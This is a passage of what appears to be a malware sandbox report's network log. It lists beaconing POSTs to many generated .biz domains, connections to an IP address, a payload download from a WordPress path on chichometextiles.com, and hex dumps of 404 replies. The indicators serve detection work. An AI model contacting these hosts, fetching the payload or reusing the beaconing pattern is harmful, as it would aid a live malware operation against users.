Source: global traffic HTTP traffic detected: POST /jshlt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /eccfsowypckinddi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qpmofftfdba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /hclqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qpbiwob HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /hhfkorwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /uack HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /rbv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /epwoomrcoonof HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /btmiljbhjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /kwpvpynqhxqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ectmddoihjyrxjp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /jdoddcjkmiicjrmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /bdvsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknown TCP traffic detected without corresponding DNS query: 62.60.190.120 (50 identical entries in the report, collapsed here; the report logs one entry per connection to this address)
Source: global traffic HTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: chichometextiles.com
Source: global traffic DNS traffic detected: DNS query: chichometextiles.com
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic DNS traffic detected: DNS query: przvgke.biz
Source: global traffic DNS traffic detected: DNS query: zlenh.biz
Source: global traffic DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic DNS traffic detected: DNS query: deoci.biz
Source: global traffic DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic DNS traffic detected: DNS query: qaynky.biz
Source: global traffic DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic DNS traffic detected: DNS query: myups.biz
Source: global traffic DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic DNS traffic detected: DNS query: jpskm.biz
Source: global traffic DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic DNS traffic detected: DNS query: vyome.biz
Source: global traffic DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic DNS traffic detected: DNS query: esuzf.biz
Source: global traffic DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic DNS traffic detected: DNS query: brsua.biz
Source: global traffic DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic DNS traffic detected: DNS query: gcedd.biz
Source: global traffic DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic DNS traffic detected: DNS query: xccjj.biz
Source: global traffic DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic DNS traffic detected: DNS query: rynmcq.biz
Source: global traffic DNS traffic detected: DNS query: uaafd.biz
Source: global traffic DNS traffic detected: DNS query: eufxebus.biz
Source: global traffic DNS traffic detected: DNS query: pwlqfu.biz
Source: global traffic DNS traffic detected: DNS query: rrqafepng.biz
Source: global traffic DNS traffic detected: DNS query: ctdtgwag.biz
Source: global traffic DNS traffic detected: DNS query: tnevuluw.biz
Source: global traffic DNS traffic detected: DNS query: whjovd.biz
Source: global traffic DNS traffic detected: DNS query: gjogvvpsf.biz
Source: global traffic DNS traffic detected: DNS query: reczwga.biz
Source: global traffic DNS traffic detected: DNS query: bghjpy.biz
Source: global traffic DNS traffic detected: DNS query: damcprvgv.biz
Source: global traffic DNS traffic detected: DNS query: ocsvqjg.biz
Source: global traffic DNS traffic detected: DNS query: ywffr.biz
Source: global traffic DNS traffic detected: DNS query: ecxbwt.biz
Source: global traffic DNS traffic detected: DNS query: pectx.biz
Source: global traffic DNS traffic detected: DNS query: zyiexezl.biz
Source: global traffic DNS traffic detected: DNS query: banwyw.biz
Source: global traffic DNS traffic detected: DNS query: muapr.biz
Source: global traffic DNS traffic detected: DNS query: wxgzshna.biz
Source: global traffic DNS traffic detected: DNS query: zrlssa.biz
Source: global traffic DNS traffic detected: DNS query: jlqltsjvh.biz
Source: global traffic DNS traffic detected: DNS query: xyrgy.biz
Source: global traffic DNS traffic detected: DNS query: htwqzczce.biz
Source: global traffic DNS traffic detected: DNS query: kvbjaur.biz
Source: global traffic DNS traffic detected: DNS query: uphca.biz
Source: global traffic DNS traffic detected: DNS query: fjumtfnz.biz
Source: global traffic DNS traffic detected: DNS query: hlzfuyy.biz
Source: global traffic DNS traffic detected: DNS query: rffxu.biz
Source: global traffic DNS traffic detected: DNS query: cikivjto.biz
Source: global traffic DNS traffic detected: DNS query: qncdaagct.biz
Source: global traffic DNS traffic detected: DNS query: shpwbsrw.biz
Source: global traffic DNS traffic detected: DNS query: cjvgcl.biz
Source: global traffic DNS traffic detected: DNS query: neazudmrq.biz
Source: global traffic DNS traffic detected: DNS query: pgfsvwx.biz
Source: global traffic DNS traffic detected: DNS query: aatcwo.biz
Source: global traffic DNS traffic detected: DNS query: kcyvxytog.biz
Source: global traffic DNS traffic detected: DNS query: nwdnxrd.biz
Source: global traffic DNS traffic detected: DNS query: ereplfx.biz
Source: global traffic DNS traffic detected: DNS query: ptrim.biz
Source: global traffic DNS traffic detected: DNS query: znwbniskf.biz
Source: unknown HTTP traffic detected: POST /xvpanbchxym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:23:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:23:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 